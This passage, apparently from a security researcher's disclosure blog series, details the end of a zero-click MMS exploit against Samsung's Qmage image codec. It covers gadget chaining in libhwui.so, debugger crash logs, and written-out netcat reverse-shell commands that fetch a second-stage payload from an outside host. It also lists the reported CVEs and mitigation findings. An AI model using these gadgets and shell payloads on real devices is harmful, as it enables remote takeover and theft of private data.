If we look at the full definition of the android::Bitmap class, as presented in Part 3, we'll notice that the address of the pixel buffer is stored not just in the heap.address field at offset 0x80, but also at offset 0x18 as part of the SkPixelRef base class:

  /* +0x18 */ void*   fPixels;

This means that to achieve our goal, we should look for routines which call a function pointer loaded from some offset within the this object, and pass the value at offsets 0x18 or 0x80 of this as its first argument. We could then point the fake vtable at that function, provided that there is a reference to it somewhere in static memory of libhwui.so or linker64.

One example of such a fitting gadget that I have found is the static Execute function used in libwebp, which is compiled into libhwui.so (not once but twice, thanks to the Qmage codec):

static void Execute(WebPWorker* const worker) {
  if (worker->hook != NULL) {
    worker->had_error |= !worker->hook(worker->data1, worker->data2);
  }
}

A static pointer to it is located in the global g_worker_interface structure:

static WebPWorkerInterface g_worker_interface = {
  Init, Reset, Sync, Launch, Execute, End
};

It calls a function pointer with two arguments, both of them loaded from an input WebPWorker structure. Let's compare it side-by-side with the prologue of android::Bitmap:

typedef struct {
struct android::Bitmap {
  /* +0x00 */ void* impl_;
  /* +0x00 */ void *vtable;
  /* +0x08 */ WebPWorkerStatus status_;
  /* +0x08 */ int32_t fRefCnt;

  /* +0x0C */ int     fWidth;
  /* +0x10 */ WebPWorkerHook hook;
  /* +0x10 */ int     fHeight;
  /* +0x18 */ void* data1;
  /* +0x18 */ void*   fPixels;
  /* +0x20 */ void* data2;
  /* +0x20 */ size_t  fRowBytes;
} WebPWorker;
};

This layout checks all the boxes for successful exploitation: data1 overlaps with fPixels, the hook function pointer is stored before it, and there is still enough room left for the fake vtable pointer and refcount. It would be hard to imagine more convenient circumstances, as we get a reliable, controlled call with a string argument with just a minor Bitmap overflow of 0x18 bytes:

  • vtable → &g_worker_interface.Sync in libhwui.so,
  • fRefCnt → 1,
  • fHeight (full 64-bit value at offset 0x10) → destination $PC value

We can once again test it via MMS against the Messages app:

Thread 45 "pool-9-thread-1" received signal SIGBUS, Bus error.
[Switching to Thread 13453.13651]
[ Legend: Modified register | Code | Heap | Stack | String ]
──────────────────────────────────────── registers ────
$x0  : 0x0000007520edcb20  →  "Hello, world!"
$x1  : 0x10
[...]
$pc  : 0x41414141414141
$cpsr: [negative ZERO CARRY overflow interrupt fast]
$fpsr: 0x10
$fpcr: 0x0
[...]
─────────────────────────────────── code:arm64:ARM ────
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x41414141414141
───────────────────────────────────────────────────────
0x0041414141414141 in ?? ()
gef➤  bt
#0  0x0041414141414141 in ?? ()
#1  0x0000007644bb78d4 in Execute ()
#2  0x0000007644d9c670 in SkBitmap::~SkBitmap()
#3  0x0000007647952f80 in doDecode
#4  0x0000007647951c90 in nativeDecodeStream
#5  0x0000000072494ff4 in ?? ()
Backtrace stopped: previous frame inner to this frame (corrupt stack?)
gef➤

This gets us within arm's reach of popping a shell on the remote device. There's just one last detail to take care of…

Adjusting the second argument

As mentioned earlier, the major difference between libc's system() and linker64's __dl_popen() is that the latter expects a pointer to readable memory in the second argument:

FILE* popen(const char* cmd, const char* mode);

Unfortunately, both techniques for setting the first parameter to a string clobber the second one with a small integer, which is never a valid pointer (see the X1 register values in the crash logs above). To solve the problem, we need to use an extra, intermediate gadget that will call another function pointer, pass through the first string argument and initialize the second one to a valid address. The ReadStreaEndError function, which is an (unused) part of the Qmage codec in libhwui.so, is the perfect candidate for the task. It operates on a structure that I have reverse-engineered and called QmageStream:

struct QmageStream {
  /* +0x00 */ void *data;
  /* +0x08 */ size_t offset;
  /* +0x10 */ size_t size;
  /* +0x18 */ int (*ReadStream)(QmageStream *stream, void *dst, size_t size);
};

The function's purpose is to read two bytes from the input stream and check if they're equal to "\xFF\x00" (in C-like pseudo code, with the QMG_CopyData wrapper edited out for clarity):

int ReadStreaEndError(QmageStream *stream) {
  unsigned char bytes[2];
  int result;

  result = stream->ReadStream(stream, bytes, 2);
  if (result >= 0 && (bytes[0] != 0xFF || bytes[1] != 0)) {
    result = -29;
  }

  return result;
}

So a function pointer from offset 0x18 of the input structure is called here, with the first argument set to the beginning of that structure, and the second being an address on the stack. That's exactly what we need, with the only downside being that the gadget limits the length of our shell command to 23 characters:

Thread 24 "pool-5-thread-1" received signal SIGBUS, Bus error.
[Switching to Thread 19535.20843]
[ Legend: Modified register | Code | Heap | Stack | String ]
──────────────────────────────────────── registers ────
$x0  : 0x0000007551ccad20  →  "It's a 23-byte command!"
$x1  : 0x000000755162f984  →  0x97e5e8ab00000000
[...]
$pc  : 0x42424242424242
$cpsr: [negative ZERO CARRY overflow interrupt fast]
$fpsr: 0x10
$fpcr: 0x0
[...]
─────────────────────────────────── code:arm64:ARM ────
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x42424242424242
───────────────────────────────────────────────────────
0x0042424242424242 in ?? ()
gef➤  hexdump $x0 L32
0x0000007551ccad20     49 74 27 73 20 61 20 32     It's a 2
0x0000007551ccad28     33 2d 62 79 74 65 20 63     3-byte c
0x0000007551ccad30     6f 6d 6d 61 6e 64 21 00     ommand!.
0x0000007551ccad38     42 42 42 42 42 42 42 42     BBBBBBBB
gef➤  bt
#0  0x0042424242424242 in ?? ()
#1  0x0000007644b6636c in ReadStreaEndError ()
Backtrace stopped: Cannot access memory at address 0x755162f9a8
gef➤

Both arguments are now compatible with the definition of __dl_popen, and if we change "BBBBBBBB" to the address of that function, we'll be able to execute arbitrary (though relatively short) commands!

Popping a (reverse) shell

While 23 characters is not much, it is perfectly sufficient to convert the short command to a full-fledged reverse shell. Android devices ship with toybox, a Unix command line tool set that includes some standard networking utilities, such as netcat. Unfortunately, the Android build of nc doesn't support the -e flag, which is the canonical way to set up a reverse shell, but we can work around that. One easy solution is to connect to a remote host and load a new command without any length restrictions, and pipe it to sh:

nc <host> <port>|sh

It's very short, leaving up to 16 bytes for the combined length of the host and port, which is plenty of space. According to my testing, the direct "nc" symlink was introduced as recently as Android 10, but even when invoking netcat through the full "toybox nc" command on Android 9 and earlier, there are 9 characters left for the host/port, and 6-letter domains are still easily registered today. In my case, let's assume I executed the following line:

nc 12.34.56.78 1338|sh

Then on port 1338 of the remote host, I served the second stage payload:

tail -n 0 -f /data/data/com.samsung.android.messaging/1 | /bin/sh -i 2>&1 | nc 12.34.56.78 1337 1> /data/data/com.samsung.android.messaging/1

This is a cool trick to spawn a reverse shell with nc without the -e option, which I found here. It pipes together tail, sh and nc to achieve the result, and uses a temporary file (in a path accessible to the target process) to store the input commands. The gist of the trick is the -f tail option, used to pass commands to sh as they arrive over the network, providing the interactive feel. Once we send the above payload on port 1338, we should momentarily receive another connection on port 1337 with the full reverse shell:

$ nc -l -p 1337 -v
Listening on [0.0.0.0] (family 0, port 1337)
Connection from <redacted> 8632 received!
/bin/sh: can't find tty fd: No such device or address
/bin/sh: warning: won't have full job control
:/ $

And that's it! As shown in the exploit demo, the attacker now has remote access to the device in the security context of the Samsung Messages app. This effectively means that they can access the SMS/MMS messages, photos, contacts, and a number of other types of information on the phone. Given that the vulnerable Qmage codec is baked so deeply in Samsung Android, the attacker could try to further expand their reach in the system by exploiting the same vulnerability locally, compromising the context of another app and gaining access to its data. One example of a potential attack target is the com.android.systemui process, which is highly privileged by nature and is responsible for handling images supplied by other apps to be displayed in notifications. In a similar vein, some degree of persistence could be established by planting an exploit .qmg file in the file system, and having it connect back to a remote host every time the user opens the Gallery app. Once initial command line access to the target phone is obtained, the possibilities of abusing Qmage bugs locally are virtually endless.

Future work

The journey of developing a zero-click MMS exploit against a modern Samsung phone running Android 10 comes to an end. The fundamental reason why the attack was possible was the custom, exceedingly fragile image codec built into Android Skia by Samsung. In order to address the immediate problem, I ran two Qmage fuzzing sessions and reported the resulting crashes to the vendor: one in January 2020 (fixed in May as SVE-2020-16747 / CVE-2020-8899), and a subsequent one in May (fixed in July as SVE-2020-17675). I would like to believe that the codec is now in a much better shape, but I encourage other members of the security community to continue testing it, either with the existing SkCodecFuzzer harness or other custom tools.

While Qmage is the primary culprit here, the vulnerabilities created a great opportunity to test the effectiveness of various Android 10 mitigations and design decisions against low-level exploitation in a realistic setting. Throughout the process, I managed to take advantage of weaknesses in various parts of the OS; some of them were only minor help, while other were absolutely critical to the feasibility of the exploitation:

  • The Samsung Messages app automatically downloads incoming MMS messages and parses attached images without user interaction and before completing communication with the MMSC, which opens up the remote attack surface and enables the creation of a crash-based ASLR oracle.
  • The image parsing code executes in the same process as the client app, and is not sandboxed similarly to video codecs.
  • The Android ASLR suffers from several flaws:
    • The Zygote design causes a persistent address space layout across subsequent instances of a crashing app, enabling partial ASLR side channel output to be accumulated over time and combined into a complete ASLR bypass.
    • The sizable CFI shadow region makes it possible to blindly locate readable memory in the address space with an ASLR oracle,
    • The relative entropy between library mappings and the shadow area is quite low, especially for linker64.
    • The presence of execute-only mappings makes it easy to recognize specific shared objects with an oracle, even if they are tightly packed in memory.
  • The crash handling logic in ActivityManager allows for infinite restarts of an unstable app, provided that no two crashes occur within 60 seconds of each other (measured with the uptimeMillis clock).
  • The jemalloc heap allocator has generally favorable properties for exploitation: it's deterministic, doesn't have inline metadata, groups chunks by size, and implements tcaches which may help control uninitialized heap memory with a high degree of precision.
  • Android allows apps to spawn native command-line programs through functions like execve, system, __dl_popen etc. The system also includes networking tools such as netcat, which can be trivially used to set up a reverse shell for convenient remote access post-exploitation.

The above list gives a good overview of the areas for improvement, and we are working with both Android and Samsung to address them and introduce new hardening measures in future versions of the OS and the Samsung Messages app. In some areas, work had already been in motion before this project; for example the upcoming Android 11 fully switches from jemalloc to Scudo as its default heap allocator, and XOM is reverted because it breaks PAN. Furthermore, the effort has already led to some changes in ASLR:


All of these mitigations already make an MMS exploit substantially harder to develop, but there is still a lot of work to do. I will strive to push for further fixes in the areas enumerated above, to make sure that similar zero-click attacks against Android devices cannot be replicated in the future.

Conclusion

The blog post series demonstrated that there are still some very attractive and largely unexplored code bases written in memory-unsafe languages and exposed in widely used software today. It strikes me that the Qmage codec has stayed out of the public eye for so long, evading any kind of fuzzing or manual audit. It raises the question of how much other untested code runs on our desktops and mobile devices every day that we know nothing about, and it highlights the importance of transparency from software vendors. It's in the interest of users to be well-informed about the relevant attack surface, and to benefit from the collective work of the security community researching publicly documented code. Otherwise, bad actors are more incentivized to look for little-known, sensitive software components, and exploit them secretly. In that context, security by obscurity doesn't work, especially if obscurity is the primary element of the software security model.

Another takeaway is that successful exploitation of memory corruption issues in zero-click scenarios is still possible, despite significant efforts being made to mitigate such attacks. Admittedly, the existing security measures in Android made the exploitation harder, slower and less reliable; specifically, thanks to address randomization and the crash handling logic, the attack took between 1h – 2.5h instead of a single message. However, none of them ultimately stopped the exploit, and all it took to bypass ASLR was the forgotten feature of MMS delivery reports coupled with a strong address probing primitive.

Clearly, memory corruption is far from a solved problem, and keeping our systems secure requires continued work on all levels of software design and development. As we've seen, even minor decisions seemingly unrelated to security – whether to allow unlimited restarts of frequently crashing apps – can make the difference between a feasible and thwarted exploit. This is where offensive exercises like this one bring the most value, as they help discern effective mitigations from futile ones, and guide further defensive work towards the areas that matter the most. On that note, I am especially looking forward to some new, fundamental advancements, such as the shift towards fast memory-safe languages like Rust, and widespread use of hardware-assisted mitigations such as Memory Tagging Extension.
❌